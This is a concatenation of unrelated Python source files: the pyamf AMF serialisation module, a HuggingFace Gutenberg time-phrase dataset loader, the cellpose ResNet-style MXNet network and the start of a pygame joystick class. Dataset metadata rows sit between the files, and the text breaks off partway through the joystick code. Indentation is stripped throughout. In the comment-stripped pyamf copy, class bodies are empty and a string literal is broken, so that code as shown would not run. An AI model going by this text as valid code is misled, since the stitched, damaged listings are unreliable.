if has('__name__'):
package = get('__name__')
else:
raise TypeError('Cannot get list of classes from %r' % (module,))
if has('__all__'):
keys = get('__all__')
elif hasattr(module, '__dict__'):
keys = module.__dict__.keys()
elif hasattr(module, 'keys'):
keys = module.keys()
elif isinstance(module, list):
keys = range(len(module))
else:
raise TypeError('Cannot get list of classes from %r' % (module,))
def check_attr(attr):
if not isinstance(attr, python.class_types):
return False
if attr.__name__ in ignore:
return False
try:
if strict and attr.__module__ != get('__name__'):
return False
except AttributeError:
return False
return True
# gotta love python
classes = filter(check_attr, [get(x) for x in keys])
registered = {}
for klass in classes:
alias = '%s%s%s' % (package, separator, klass.__name__)
registered[klass] = register_class(klass, alias)
return registered
def set_default_etree(etree):
"""
Sets the default interface that will called apon to both de/serialise XML
entities. This means providing both C{tostring} and C{fromstring} functions.
For testing purposes, will return the previous value for this (if any).
"""
from pyamf import xml
return xml.set_default_interface(etree)
#: setup some some standard class registrations and class loaders.
register_class(ASObject)
register_class_loader(flex_loader)
register_class_loader(blaze_loader)
register_alias_type(TypedObjectClassAlias, TypedObject)
register_alias_type(ErrorAlias, Exception)
register_adapters()
| 28.256773
| 104
| 0.644393
|
import types
import inspect
from pyamf import util, _version
from pyamf.adapters import register_adapters
from pyamf import python
from pyamf.alias import ClassAlias, UnknownClassAlias
__all__ = [
'register_class',
'register_class_loader',
'encode',
'decode',
'__version__',
'version'
]
__version__ = version = _version.version
CLASS_CACHE = {}
CLASS_LOADERS = set()
TYPE_MAP = {}
ERROR_CLASS_MAP = {
TypeError.__name__: TypeError,
KeyError.__name__: KeyError,
LookupError.__name__: LookupError,
IndexError.__name__: IndexError,
NameError.__name__: NameError,
ValueError.__name__: ValueError
}
ALIAS_TYPES = {}
AMF0 = 0
AMF3 = 3
ENCODING_TYPES = (AMF0, AMF3)
DEFAULT_ENCODING = AMF3
class UndefinedType(object):
def __repr__(self):
return 'pyamf.Undefined'
Undefined = UndefinedType()
class BaseError(Exception):
class DecodeError(BaseError):
class EOStream(BaseError):
class ReferenceError(BaseError):
class EncodeError(BaseError):
class ASObject(dict):
class __amf__:
dynamic = True
def __getattr__(self, k):
try:
return self[k]
except KeyError:
raise AttributeError('Unknown attribute \'%s\'' % (k,))
def __setattr__(self, k, v):
self[k] = v
def __repr__(self):
return dict.__repr__(self)
def __hash__(self):
return id(self)
class MixedArray(dict):
class TypedObject(dict):
def __init__(self, alias):
dict.__init__(self)
self.alias = alias
def __readamf__(self, o):
raise DecodeError('Unable to decode an externalised stream with '
'class alias \'%s\'.\n\nA class alias was found and because '
'strict mode is False an attempt was made to decode the object '
'automatically. To decode this stream, a registered class with '
'the alias and a corresponding __readamf__ method will be '
'required.' % (self.alias,))
def __writeamf__(self, o):
raise EncodeError('Unable to encode an externalised stream with '
'class alias \'%s\'.\n\nA class alias was found and because '
'strict mode is False an attempt was made to encode the object '
'automatically. To encode this stream, a registered class with '
'the alias and a corresponding __writeamf__ method will be '
'required.' % (self.alias,))
class TypedObjectClassAlias(ClassAlias):
klass = TypedObject
def __init__(self, *args, **kwargs):
ClassAlias.__init__(self, self.klass, kwargs.pop('alias', args[0]))
def createInstance(self, codec=None):
return self.klass(self.alias)
def checkClass(kls, klass):
pass
class ErrorAlias(ClassAlias):
def getCustomProperties(self):
self.exclude_attrs.update(['args'])
def getEncodableAttributes(self, obj, **kwargs):
attrs = ClassAlias.getEncodableAttributes(self, obj, **kwargs)
attrs['message'] = str(obj)
attrs['name'] = obj.__class__.__name__
return attrs
def register_class(klass, alias=None):
meta = util.get_class_meta(klass)
if alias is not None:
meta['alias'] = alias
alias_klass = util.get_class_alias(klass) or ClassAlias
x = alias_klass(klass, defer=True, **meta)
if not x.anonymous:
CLASS_CACHE[x.alias] = x
CLASS_CACHE[klass] = x
return x
def unregister_class(alias):
try:
x = CLASS_CACHE[alias]
except KeyError:
raise UnknownClassAlias('Unknown alias %r' % (alias,))
if not x.anonymous:
del CLASS_CACHE[x.alias]
del CLASS_CACHE[x.klass]
return x
def get_class_alias(klass_or_alias):
if isinstance(klass_or_alias, python.str_types):
try:
return CLASS_CACHE[klass_or_alias]
except KeyError:
return load_class(klass_or_alias)
try:
return CLASS_CACHE[klass_or_alias]
except KeyError:
raise UnknownClassAlias('Unknown alias for %r' % (klass_or_alias,))
def register_class_loader(loader):
if not hasattr(loader, '__call__'):
raise TypeError("loader must be callable")
CLASS_LOADERS.update([loader])
def unregister_class_loader(loader):
try:
CLASS_LOADERS.remove(loader)
except KeyError:
raise LookupError("loader not found")
def load_class(alias):
try:
return CLASS_CACHE[alias]
except KeyError:
pass
for loader in CLASS_LOADERS:
klass = loader(alias)
if klass is None:
continue
if isinstance(klass, python.class_types):
return register_class(klass, alias)
elif isinstance(klass, ClassAlias):
CLASS_CACHE[klass.alias] = klass
CLASS_CACHE[klass.klass] = klass
return klass
raise TypeError("Expecting class object or ClassAlias from loader")
mod_class = alias.split('.')
if mod_class:
module = '.'.join(mod_class[:-1])
klass = mod_class[-1]
try:
module = util.get_module(module)
except (ImportError, AttributeError):
pass
else:
klass = getattr(module, klass)
if isinstance(klass, python.class_types):
return register_class(klass, alias)
elif isinstance(klass, ClassAlias):
CLASS_CACHE[klass.alias] = klass
CLASS_CACHE[klass.klass] = klass
return klass.klass
else:
raise TypeError("Expecting class type or ClassAlias from loader")
raise UnknownClassAlias("Unknown alias for %r" % (alias,))
def decode(stream, *args, **kwargs):
encoding = kwargs.pop('encoding', DEFAULT_ENCODING)
decoder = get_decoder(encoding, stream, *args, **kwargs)
return decoder
def encode(*args, **kwargs):
encoding = kwargs.pop('encoding', DEFAULT_ENCODING)
encoder = get_encoder(encoding, **kwargs)
[encoder.writeElement(el) for el in args]
stream = encoder.stream
stream.seek(0)
return stream
def get_decoder(encoding, *args, **kwargs):
def _get_decoder_class():
if encoding == AMF0:
try:
from cpyamf import amf0
except ImportError:
from pyamf import amf0
return amf0.Decoder
elif encoding == AMF3:
try:
from cpyamf import amf3
except ImportError:
from pyamf import amf3
return amf3.Decoder
raise ValueError("Unknown encoding %r" % (encoding,))
return _get_decoder_class()(*args, **kwargs)
def get_encoder(encoding, *args, **kwargs):
def _get_encoder_class():
if encoding == AMF0:
try:
from cpyamf import amf0
except ImportError:
from pyamf import amf0
return amf0.Encoder
elif encoding == AMF3:
try:
from cpyamf import amf3
except ImportError:
from pyamf import amf3
return amf3.Encoder
raise ValueError("Unknown encoding %r" % (encoding,))
return _get_encoder_class()(*args, **kwargs)
def blaze_loader(alias):
if alias not in ['DSC', 'DSK']:
return
import pyamf.flex.messaging
return CLASS_CACHE[alias]
def flex_loader(alias):
if not alias.startswith('flex.'):
return
try:
if alias.startswith('flex.messaging.messages'):
import pyamf.flex.messaging
elif alias.startswith('flex.messaging.io'):
import pyamf.flex
elif alias.startswith('flex.data.messages'):
import pyamf.flex.data
return CLASS_CACHE[alias]
except KeyError:
raise UnknownClassAlias(alias)
def add_type(type_, func=None):
def _check_type(type_):
if not (isinstance(type_, python.class_types) or
hasattr(type_, '__call__')):
raise TypeError(r'Unable to add '%r' as a custom type (expected a '
'class or callable)' % (type_,))
if isinstance(type_, list):
type_ = tuple(type_)
if type_ in TYPE_MAP:
raise KeyError('Type %r already exists' % (type_,))
if isinstance(type_, types.TupleType):
for x in type_:
_check_type(x)
else:
_check_type(type_)
TYPE_MAP[type_] = func
def get_type(type_):
if isinstance(type_, list):
type_ = tuple(type_)
for k, v in TYPE_MAP.iteritems():
if k == type_:
return v
raise KeyError("Unknown type %r" % (type_,))
def remove_type(type_):
declaration = get_type(type_)
del TYPE_MAP[type_]
return declaration
def add_error_class(klass, code):
if not isinstance(code, python.str_types):
code = code.decode('utf-8')
if not isinstance(klass, python.class_types):
raise TypeError("klass must be a class type")
mro = inspect.getmro(klass)
if not Exception in mro:
raise TypeError(
'Error classes must subclass the __builtin__.Exception class')
if code in ERROR_CLASS_MAP:
raise ValueError('Code %s is already registered' % (code,))
ERROR_CLASS_MAP[code] = klass
def remove_error_class(klass):
if isinstance(klass, python.str_types):
if klass not in ERROR_CLASS_MAP:
raise ValueError('Code %s is not registered' % (klass,))
elif isinstance(klass, python.class_types):
classes = ERROR_CLASS_MAP.values()
if klass not in classes:
raise ValueError('Class %s is not registered' % (klass,))
klass = ERROR_CLASS_MAP.keys()[classes.index(klass)]
else:
raise TypeError("Invalid type, expected class or string")
del ERROR_CLASS_MAP[klass]
def register_alias_type(klass, *args):
def check_type_registered(arg):
for k, v in ALIAS_TYPES.iteritems():
for kl in v:
if arg is kl:
raise RuntimeError('%r is already registered under %r' % (
arg, k))
if not isinstance(klass, python.class_types):
raise TypeError('klass must be class')
if not issubclass(klass, ClassAlias):
raise ValueError('New aliases must subclass pyamf.ClassAlias')
if len(args) == 0:
raise ValueError('At least one type must be supplied')
if len(args) == 1 and hasattr(args[0], '__call__'):
c = args[0]
check_type_registered(c)
else:
for arg in args:
if not isinstance(arg, python.class_types):
raise TypeError('%r must be class' % (arg,))
check_type_registered(arg)
ALIAS_TYPES[klass] = args
for k, v in CLASS_CACHE.copy().iteritems():
new_alias = util.get_class_alias(v.klass)
if new_alias is klass:
meta = util.get_class_meta(v.klass)
meta['alias'] = v.alias
alias_klass = klass(v.klass, **meta)
CLASS_CACHE[k] = alias_klass
CLASS_CACHE[v.klass] = alias_klass
def unregister_alias_type(klass):
return ALIAS_TYPES.pop(klass, None)
def register_package(module=None, package=None, separator='.', ignore=[],
strict=True):
if isinstance(module, python.str_types):
if module == '':
raise TypeError('Cannot get list of classes from %r' % (module,))
package = module
module = None
if module is None:
import inspect
prev_frame = inspect.stack()[1][0]
module = prev_frame.f_locals
if type(module) is dict:
has = lambda x: x in module
get = module.__getitem__
elif type(module) is list:
has = lambda x: x in module
get = module.__getitem__
strict = False
else:
has = lambda x: hasattr(module, x)
get = lambda x: getattr(module, x)
if package is None:
if has('__name__'):
package = get('__name__')
else:
raise TypeError('Cannot get list of classes from %r' % (module,))
if has('__all__'):
keys = get('__all__')
elif hasattr(module, '__dict__'):
keys = module.__dict__.keys()
elif hasattr(module, 'keys'):
keys = module.keys()
elif isinstance(module, list):
keys = range(len(module))
else:
raise TypeError('Cannot get list of classes from %r' % (module,))
def check_attr(attr):
if not isinstance(attr, python.class_types):
return False
if attr.__name__ in ignore:
return False
try:
if strict and attr.__module__ != get('__name__'):
return False
except AttributeError:
return False
return True
classes = filter(check_attr, [get(x) for x in keys])
registered = {}
for klass in classes:
alias = '%s%s%s' % (package, separator, klass.__name__)
registered[klass] = register_class(klass, alias)
return registered
def set_default_etree(etree):
from pyamf import xml
return xml.set_default_interface(etree)
register_class(ASObject)
register_class_loader(flex_loader)
register_class_loader(blaze_loader)
register_alias_type(TypedObjectClassAlias, TypedObject)
register_alias_type(ErrorAlias, Exception)
register_adapters()
| true
| true
|
1c42115399dbe0144a26fa8dc6aa87e3e16e5769
| 4,117
|
py
|
Python
|
datasets/gutenberg_time/gutenberg_time.py
|
WojciechKusa/datasets
|
1406a04c3e911cec2680d8bc513653e0cafcaaa4
|
[
"Apache-2.0"
] | 10,608
|
2020-09-10T15:47:50.000Z
|
2022-03-31T22:51:47.000Z
|
datasets/gutenberg_time/gutenberg_time.py
|
realChainLife/datasets
|
98261e8b0b7be4dbaaa71ae188b950f7fbe51bbd
|
[
"Apache-2.0"
] | 2,396
|
2020-09-10T14:55:31.000Z
|
2022-03-31T19:41:04.000Z
|
datasets/gutenberg_time/gutenberg_time.py
|
realChainLife/datasets
|
98261e8b0b7be4dbaaa71ae188b950f7fbe51bbd
|
[
"Apache-2.0"
] | 1,530
|
2020-09-10T21:43:10.000Z
|
2022-03-31T01:59:12.000Z
|
# coding=utf-8
# Copyright 2020 The HuggingFace Datasets Authors and the current dataset script contributor.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Recognizing the flow of time in a story is a crucial aspect of understanding it. Prior work related to time has primarily focused on identifying temporal expressions or relative sequencing of events, but here we propose computationally annotating each line of a book with wall clock times, even in the absence of explicit time-descriptive phrases. To do so, we construct a data set of hourly time phrases from 52,183 fictional books."""
import csv
import os
import datasets
_CITATION = """\
@misc{kim2020time,
title={What time is it? Temporal Analysis of Novels},
author={Allen Kim and Charuta Pethe and Steven Skiena},
year={2020},
eprint={2011.04124},
archivePrefix={arXiv},
primaryClass={cs.CL}
}
"""
_DESCRIPTION = """\
A clean data resource containing all explicit time references in a dataset of 52,183 novels whose full text is available via Project Gutenberg.
"""
_HOMEPAGE = "https://github.com/allenkim/what-time-is-it"
_LICENSE = "[More Information needed]"
# The HuggingFace dataset library don't host the datasets but only point to the original files
# This can be an arbitrary nested dict/list of URLs (see below in `_split_generators` method)
_URLs = {
"gutenberg": "https://github.com/TevenLeScao/what-time-is-it/blob/master/gutenberg_time_phrases.zip?raw=true",
}
class GutenbergTime(datasets.GeneratorBasedBuilder):
"""Novel extracts with time-of-the-day information"""
VERSION = datasets.Version("1.1.3")
BUILDER_CONFIGS = [
datasets.BuilderConfig(name="gutenberg", description="Data pulled from the Gutenberg project"),
]
def _info(self):
features = datasets.Features(
{
"guten_id": datasets.Value("string"),
"hour_reference": datasets.Value("string"),
"time_phrase": datasets.Value("string"),
"is_ambiguous": datasets.Value("bool_"),
"time_pos_start": datasets.Value("int64"),
"time_pos_end": datasets.Value("int64"),
"tok_context": datasets.Value("string"),
}
)
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=features,
supervised_keys=None,
homepage=_HOMEPAGE,
license=_LICENSE,
citation=_CITATION,
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
my_urls = _URLs[self.config.name]
data = dl_manager.download_and_extract(my_urls)
return [
datasets.SplitGenerator(
name=datasets.Split.TRAIN,
# These kwargs will be passed to _generate_examples
gen_kwargs={
"filepath": os.path.join(data, "gutenberg_time_phrases.csv"),
"split": "train",
},
)
]
def _generate_examples(self, filepath, split):
with open(filepath, encoding="utf8") as f:
data = csv.reader(f)
next(data)
for id_, row in enumerate(data):
yield id_, {
"guten_id": row[0],
"hour_reference": row[1],
"time_phrase": row[2],
"is_ambiguous": row[3],
"time_pos_start": row[4],
"time_pos_end": row[5],
"tok_context": row[6],
}
| 37.770642
| 439
| 0.632499
|
import csv
import os
import datasets
_CITATION = """\
@misc{kim2020time,
title={What time is it? Temporal Analysis of Novels},
author={Allen Kim and Charuta Pethe and Steven Skiena},
year={2020},
eprint={2011.04124},
archivePrefix={arXiv},
primaryClass={cs.CL}
}
"""
_DESCRIPTION = """\
A clean data resource containing all explicit time references in a dataset of 52,183 novels whose full text is available via Project Gutenberg.
"""
_HOMEPAGE = "https://github.com/allenkim/what-time-is-it"
_LICENSE = "[More Information needed]"
# This can be an arbitrary nested dict/list of URLs (see below in `_split_generators` method)
_URLs = {
"gutenberg": "https://github.com/TevenLeScao/what-time-is-it/blob/master/gutenberg_time_phrases.zip?raw=true",
}
class GutenbergTime(datasets.GeneratorBasedBuilder):
VERSION = datasets.Version("1.1.3")
BUILDER_CONFIGS = [
datasets.BuilderConfig(name="gutenberg", description="Data pulled from the Gutenberg project"),
]
def _info(self):
features = datasets.Features(
{
"guten_id": datasets.Value("string"),
"hour_reference": datasets.Value("string"),
"time_phrase": datasets.Value("string"),
"is_ambiguous": datasets.Value("bool_"),
"time_pos_start": datasets.Value("int64"),
"time_pos_end": datasets.Value("int64"),
"tok_context": datasets.Value("string"),
}
)
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=features,
supervised_keys=None,
homepage=_HOMEPAGE,
license=_LICENSE,
citation=_CITATION,
)
def _split_generators(self, dl_manager):
my_urls = _URLs[self.config.name]
data = dl_manager.download_and_extract(my_urls)
return [
datasets.SplitGenerator(
name=datasets.Split.TRAIN,
# These kwargs will be passed to _generate_examples
gen_kwargs={
"filepath": os.path.join(data, "gutenberg_time_phrases.csv"),
"split": "train",
},
)
]
def _generate_examples(self, filepath, split):
with open(filepath, encoding="utf8") as f:
data = csv.reader(f)
next(data)
for id_, row in enumerate(data):
yield id_, {
"guten_id": row[0],
"hour_reference": row[1],
"time_phrase": row[2],
"is_ambiguous": row[3],
"time_pos_start": row[4],
"time_pos_end": row[5],
"tok_context": row[6],
}
| true
| true
|
1c4211be12ac569a922d65f12f4891262c862e23
| 6,936
|
py
|
Python
|
cellpose/resnet_style.py
|
YinuoJin/cellpose
|
eb8df70f295ac8465633f468d487aee1dd13a181
|
[
"BSD-3-Clause"
] | 504
|
2020-02-04T06:42:53.000Z
|
2022-03-31T06:13:11.000Z
|
cellpose/resnet_style.py
|
YinuoJin/cellpose
|
eb8df70f295ac8465633f468d487aee1dd13a181
|
[
"BSD-3-Clause"
] | 457
|
2020-02-04T20:53:06.000Z
|
2022-03-30T07:30:32.000Z
|
cellpose/resnet_style.py
|
YinuoJin/cellpose
|
eb8df70f295ac8465633f468d487aee1dd13a181
|
[
"BSD-3-Clause"
] | 208
|
2020-02-04T15:50:20.000Z
|
2022-03-31T14:57:48.000Z
|
from mxnet import gluon, nd
from mxnet.gluon import nn
import numpy as np
nfeat = 128
sz = [3, 3, 3, 3, 3]
sz2 = [3, 3, 3, 3, 3]
szf = [1]
def total_variation_loss(x):
""" regularize convolutional masks (not currently in use) """
a = nd.square(x[:, :, :-1, :-1] - x[:, :, 1:, :-1])
b = nd.square(x[:, :, :-1, :-1] - x[:, :, :-1, 1:])
return nd.sum(nd.mean(nd.power(a + b, 1.25), axis=(2,3)))
def convbatchrelu(nconv, sz):
conv = nn.HybridSequential()
with conv.name_scope():
conv.add(
nn.Conv2D(nconv, kernel_size=sz, padding=sz//2),
nn.BatchNorm(axis=1),
nn.Activation('relu'),
)
return conv
def batchconv(nconv, sz):
conv = nn.HybridSequential()
with conv.name_scope():
conv.add(
nn.BatchNorm(axis=1),
nn.Activation('relu'),
nn.Conv2D(nconv, kernel_size=sz, padding=sz//2),
)
return conv
def batchconv0(nconv, sz):
conv = nn.HybridSequential()
with conv.name_scope():
conv.add(
nn.BatchNorm(axis=1),
nn.Conv2D(nconv, kernel_size=sz, padding=sz//2),
)
return conv
class resdown(nn.HybridBlock):
def __init__(self, nconv, **kwargs):
super(resdown, self).__init__(**kwargs)
with self.name_scope():
self.conv = nn.HybridSequential()
for t in range(4):
self.conv.add( batchconv(nconv, 3))
self.proj = batchconv0(nconv, 1)
def hybrid_forward(self, F, x):
x = self.proj(x) + self.conv[1](self.conv[0](x))
x = x + self.conv[3](self.conv[2](x))
return x
class convdown(nn.HybridBlock):
def __init__(self, nconv, **kwargs):
super(convdown, self).__init__(**kwargs)
with self.name_scope():
self.conv = nn.HybridSequential()
for t in range(2):
self.conv.add(batchconv(nconv, 3))
def hybrid_forward(self, F, x):
x = self.conv[0](x)
x = self.conv[1](x)
return x
class downsample(nn.HybridBlock):
def __init__(self, nbase, residual_on=True, **kwargs):
super(downsample, self).__init__(**kwargs)
with self.name_scope():
self.down = nn.HybridSequential()
for n in range(len(nbase)):
if residual_on:
self.down.add(resdown(nbase[n]))
else:
self.down.add(convdown(nbase[n]))
def hybrid_forward(self, F, x):
xd = []
for n in range(len(self.down)):
if n>0:
y = F.Pooling(xd[n-1], kernel=(2,2), stride=(2,2), pool_type='max')
else:
y = x
xd.append(self.down[n](y))
return xd
class batchconvstyle(nn.HybridBlock):
def __init__(self, nconv, concatenation=False, **kwargs):
super(batchconvstyle, self).__init__(**kwargs)
with self.name_scope():
self.conv = batchconv(nconv, 3)
if concatenation:
self.full = nn.Dense(nconv*2)
else:
self.full = nn.Dense(nconv)
self.concatenation = concatenation
def hybrid_forward(self, F, style, x, y=None):
if y is not None:
if self.concatenation:
x = F.concat(y, x, dim=1)
else:
x = x + y
feat = self.full(style)
y = F.broadcast_add(x, feat.expand_dims(-1).expand_dims(-1))
y = self.conv(y)
return y
class convup(nn.HybridBlock):
def __init__(self, nconv, concatenation=False, **kwargs):
super(convup, self).__init__(**kwargs)
with self.name_scope():
self.conv = nn.HybridSequential()
self.conv.add(batchconv(nconv, 3))
self.conv.add(batchconvstyle(nconv, concatenation))
def hybrid_forward(self, F, x, y, style):
x = self.conv[0](x)
x = self.conv[1](style, x, y)
return x
class resup(nn.HybridBlock):
def __init__(self, nconv, concatenation=False, **kwargs):
super(resup, self).__init__(**kwargs)
with self.name_scope():
self.conv = nn.HybridSequential()
self.conv.add(batchconv(nconv,3))
self.conv.add(batchconvstyle(nconv, concatenation))
self.conv.add(batchconvstyle(nconv))
self.conv.add(batchconvstyle(nconv))
self.proj = batchconv0(nconv, 1)
def hybrid_forward(self, F, x, y, style):
x = self.proj(x) + self.conv[1](style, self.conv[0](x), y)
x = x + self.conv[3](style, self.conv[2](style, x))
return x
class upsample(nn.HybridBlock):
def __init__(self, nbase, residual_on=True, concatenation=False, **kwargs):
super(upsample, self).__init__(**kwargs)
with self.name_scope():
self.up = nn.HybridSequential()
for n in range(len(nbase)):
if residual_on:
self.up.add(resup(nbase[n], concatenation=concatenation))
else:
self.up.add(convup(nbase[n], concatenation=concatenation))
def hybrid_forward(self, F, style, xd):
x= self.up[-1](xd[-1], xd[-1], style)
for n in range(len(self.up)-2,-1,-1):
x= F.UpSampling(x, scale=2, sample_type='nearest')
x = self.up[n](x, xd[n], style)
return x
class make_style(nn.HybridBlock):
def __init__(self, **kwargs):
super(make_style, self).__init__(**kwargs)
with self.name_scope():
self.pool_all = nn.GlobalAvgPool2D()
self.flatten = nn.Flatten()
def hybrid_forward(self, F, x0):
style = self.pool_all(x0)
style = self.flatten(style)
style = F.broadcast_div(style , F.sum(style**2, axis=1).expand_dims(1)**.5)
return style
class CPnet(gluon.HybridBlock):
def __init__(self, nbase, nout, residual_on=True, style_on=True, concatenation=False, **kwargs):
super(CPnet, self).__init__(**kwargs)
with self.name_scope():
self.nbase = nbase
self.downsample = downsample(nbase, residual_on=residual_on)
self.upsample = upsample(nbase, residual_on=residual_on, concatenation=concatenation)
self.output = batchconv(nout, 1)
self.make_style = make_style()
self.style_on = style_on
def hybrid_forward(self, F, data):
#data = self.conv1(data)
T0 = self.downsample(data)
style = self.make_style(T0[-1])
style0 = style
if not self.style_on:
style = style * 0
T0 = self.upsample(style, T0)
T0 = self.output(T0)
return T0, style0
def save_model(self, filename):
self.save_parameters(filename)
def load_model(self, filename, cpu=None):
self.load_parameters(filename)
| 33.346154
| 100
| 0.560409
|
from mxnet import gluon, nd
from mxnet.gluon import nn
import numpy as np
nfeat = 128
sz = [3, 3, 3, 3, 3]
sz2 = [3, 3, 3, 3, 3]
szf = [1]
def total_variation_loss(x):
a = nd.square(x[:, :, :-1, :-1] - x[:, :, 1:, :-1])
b = nd.square(x[:, :, :-1, :-1] - x[:, :, :-1, 1:])
return nd.sum(nd.mean(nd.power(a + b, 1.25), axis=(2,3)))
def convbatchrelu(nconv, sz):
conv = nn.HybridSequential()
with conv.name_scope():
conv.add(
nn.Conv2D(nconv, kernel_size=sz, padding=sz//2),
nn.BatchNorm(axis=1),
nn.Activation('relu'),
)
return conv
def batchconv(nconv, sz):
conv = nn.HybridSequential()
with conv.name_scope():
conv.add(
nn.BatchNorm(axis=1),
nn.Activation('relu'),
nn.Conv2D(nconv, kernel_size=sz, padding=sz//2),
)
return conv
def batchconv0(nconv, sz):
conv = nn.HybridSequential()
with conv.name_scope():
conv.add(
nn.BatchNorm(axis=1),
nn.Conv2D(nconv, kernel_size=sz, padding=sz//2),
)
return conv
class resdown(nn.HybridBlock):
def __init__(self, nconv, **kwargs):
super(resdown, self).__init__(**kwargs)
with self.name_scope():
self.conv = nn.HybridSequential()
for t in range(4):
self.conv.add( batchconv(nconv, 3))
self.proj = batchconv0(nconv, 1)
def hybrid_forward(self, F, x):
x = self.proj(x) + self.conv[1](self.conv[0](x))
x = x + self.conv[3](self.conv[2](x))
return x
class convdown(nn.HybridBlock):
def __init__(self, nconv, **kwargs):
super(convdown, self).__init__(**kwargs)
with self.name_scope():
self.conv = nn.HybridSequential()
for t in range(2):
self.conv.add(batchconv(nconv, 3))
def hybrid_forward(self, F, x):
x = self.conv[0](x)
x = self.conv[1](x)
return x
class downsample(nn.HybridBlock):
def __init__(self, nbase, residual_on=True, **kwargs):
super(downsample, self).__init__(**kwargs)
with self.name_scope():
self.down = nn.HybridSequential()
for n in range(len(nbase)):
if residual_on:
self.down.add(resdown(nbase[n]))
else:
self.down.add(convdown(nbase[n]))
def hybrid_forward(self, F, x):
xd = []
for n in range(len(self.down)):
if n>0:
y = F.Pooling(xd[n-1], kernel=(2,2), stride=(2,2), pool_type='max')
else:
y = x
xd.append(self.down[n](y))
return xd
class batchconvstyle(nn.HybridBlock):
def __init__(self, nconv, concatenation=False, **kwargs):
super(batchconvstyle, self).__init__(**kwargs)
with self.name_scope():
self.conv = batchconv(nconv, 3)
if concatenation:
self.full = nn.Dense(nconv*2)
else:
self.full = nn.Dense(nconv)
self.concatenation = concatenation
def hybrid_forward(self, F, style, x, y=None):
if y is not None:
if self.concatenation:
x = F.concat(y, x, dim=1)
else:
x = x + y
feat = self.full(style)
y = F.broadcast_add(x, feat.expand_dims(-1).expand_dims(-1))
y = self.conv(y)
return y
class convup(nn.HybridBlock):
def __init__(self, nconv, concatenation=False, **kwargs):
super(convup, self).__init__(**kwargs)
with self.name_scope():
self.conv = nn.HybridSequential()
self.conv.add(batchconv(nconv, 3))
self.conv.add(batchconvstyle(nconv, concatenation))
def hybrid_forward(self, F, x, y, style):
x = self.conv[0](x)
x = self.conv[1](style, x, y)
return x
class resup(nn.HybridBlock):
def __init__(self, nconv, concatenation=False, **kwargs):
super(resup, self).__init__(**kwargs)
with self.name_scope():
self.conv = nn.HybridSequential()
self.conv.add(batchconv(nconv,3))
self.conv.add(batchconvstyle(nconv, concatenation))
self.conv.add(batchconvstyle(nconv))
self.conv.add(batchconvstyle(nconv))
self.proj = batchconv0(nconv, 1)
def hybrid_forward(self, F, x, y, style):
x = self.proj(x) + self.conv[1](style, self.conv[0](x), y)
x = x + self.conv[3](style, self.conv[2](style, x))
return x
class upsample(nn.HybridBlock):
def __init__(self, nbase, residual_on=True, concatenation=False, **kwargs):
super(upsample, self).__init__(**kwargs)
with self.name_scope():
self.up = nn.HybridSequential()
for n in range(len(nbase)):
if residual_on:
self.up.add(resup(nbase[n], concatenation=concatenation))
else:
self.up.add(convup(nbase[n], concatenation=concatenation))
def hybrid_forward(self, F, style, xd):
x= self.up[-1](xd[-1], xd[-1], style)
for n in range(len(self.up)-2,-1,-1):
x= F.UpSampling(x, scale=2, sample_type='nearest')
x = self.up[n](x, xd[n], style)
return x
class make_style(nn.HybridBlock):
def __init__(self, **kwargs):
super(make_style, self).__init__(**kwargs)
with self.name_scope():
self.pool_all = nn.GlobalAvgPool2D()
self.flatten = nn.Flatten()
def hybrid_forward(self, F, x0):
style = self.pool_all(x0)
style = self.flatten(style)
style = F.broadcast_div(style , F.sum(style**2, axis=1).expand_dims(1)**.5)
return style
class CPnet(gluon.HybridBlock):
def __init__(self, nbase, nout, residual_on=True, style_on=True, concatenation=False, **kwargs):
super(CPnet, self).__init__(**kwargs)
with self.name_scope():
self.nbase = nbase
self.downsample = downsample(nbase, residual_on=residual_on)
self.upsample = upsample(nbase, residual_on=residual_on, concatenation=concatenation)
self.output = batchconv(nout, 1)
self.make_style = make_style()
self.style_on = style_on
def hybrid_forward(self, F, data):
T0 = self.downsample(data)
style = self.make_style(T0[-1])
style0 = style
if not self.style_on:
style = style * 0
T0 = self.upsample(style, T0)
T0 = self.output(T0)
return T0, style0
def save_model(self, filename):
self.save_parameters(filename)
def load_model(self, filename, cpu=None):
self.load_parameters(filename)
| true
| true
|
1c42124eb9ac9ec0b0d34996cbda5ac176daf67c
| 11,640
|
py
|
Python
|
my_pygame/joystick.py
|
francis-clairicia/Py-Game-Case
|
af2da857f2ef758051ad3c174d77f5a2deab935d
|
[
"MIT"
] | 6
|
2022-02-10T09:07:56.000Z
|
2022-02-10T10:36:18.000Z
|
my_pygame/joystick.py
|
francis-clairicia/Py-Game-Case
|
af2da857f2ef758051ad3c174d77f5a2deab935d
|
[
"MIT"
] | null | null | null |
my_pygame/joystick.py
|
francis-clairicia/Py-Game-Case
|
af2da857f2ef758051ad3c174d77f5a2deab935d
|
[
"MIT"
] | null | null | null |
# -*-coding:Utf-8-*
import os
import sys
from typing import Union, Optional, Iterator
import pickle
import pygame
class Joystick:
def __init__(self, index: int):
self.__index = index
self.__joystick = pygame.joystick.Joystick(index) if index in range(Joystick.count()) else None
self.__button_list = ["A", "B", "X", "Y", "L1", "L2", "R1", "R2", "SELECT", "START", "L3", "R3", "HOME"]
self.__axis_list = ["AXIS_LEFT_X", "AXIS_LEFT_Y", "AXIS_RIGHT_X", "AXIS_RIGHT_Y"]
self.__dpad_list = ["UP", "DOWN", "LEFT", "RIGHT"]
self.__event_type = {key: [str(), -1, 0] for key in self.button_list + self.axis_list + self.dpad_list}
self.__save_file = os.path.join(sys.path[0], "joystick.bin")
if os.path.isfile(self.__save_file):
with open(self.__save_file, "rb") as save:
self.__save = pickle.load(save)
else:
self.__save = dict()
self.set_default_layout()
self.__button_axis_return_bool = False
"""-----------------------------------------------------"""
def connected(self) -> bool:
return bool(self.__joystick is not None)
def event_connect(self, event: pygame.event.Event) -> None:
if self.connected():
return
if event.type in (pygame.CONTROLLERDEVICEADDED, pygame.JOYDEVICEADDED) and event.device_index == self.__index:
self.__joystick = pygame.joystick.Joystick(event.device_index)
if self.guid in self.__save:
self.__event_type = self.__save[self.guid]
else:
